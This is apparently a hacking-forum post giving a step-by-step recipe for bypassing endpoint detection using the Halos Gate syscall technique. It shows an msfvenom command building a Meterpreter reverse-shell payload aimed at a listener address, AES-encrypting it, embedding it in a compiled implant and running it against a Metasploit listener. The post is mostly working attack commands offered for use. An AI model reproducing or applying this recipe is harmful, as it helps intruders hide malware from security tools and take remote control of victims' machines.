Login Register
The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.


Bypass EDR with Halos Gate filter_list
Author
Message
Bypass EDR with Halos Gate #1
Hello guys,

Halos Gate is a patch to Hells Gate work with Hooked NTDLL without reading a net copy of NTDLL from disk.
The syscall number is caught from neighbors.


Create a RAW payload with Msfveonm
msfvenom -p windows/x64/meterpreter/reverse_* lhost=192.168.10.5 lport=4545 -f raw > meterpreter.raw

AES your payload (use aes.py from Sektor7)
python aes.py meterpreter.raw > meterpreter-shellcode.txt

Results:
AESkey[] = { 0x83, 0xef, ... }
payload[] = { 0x71, 0x77, 0xc2, 0xdb, 0x16, ... }

Change implant:
“AESkey" --> “key”
“payload” --> “payload”

Compile
gcc implant.cpp -o implant.exe

Remenber to open the Msfconsole and ser your listener

Execute the file gererated
implant.exe

Reply





Messages In This Thread
Bypass EDR with Halos Gate - by 0x7FFE4A71 - 07-25-2024, 11:12 AM
RE: Bypass EDR with Halos Gate - by jamescollink - 10-02-2024, 07:09 AM



Users browsing this thread: 1 Guest(s)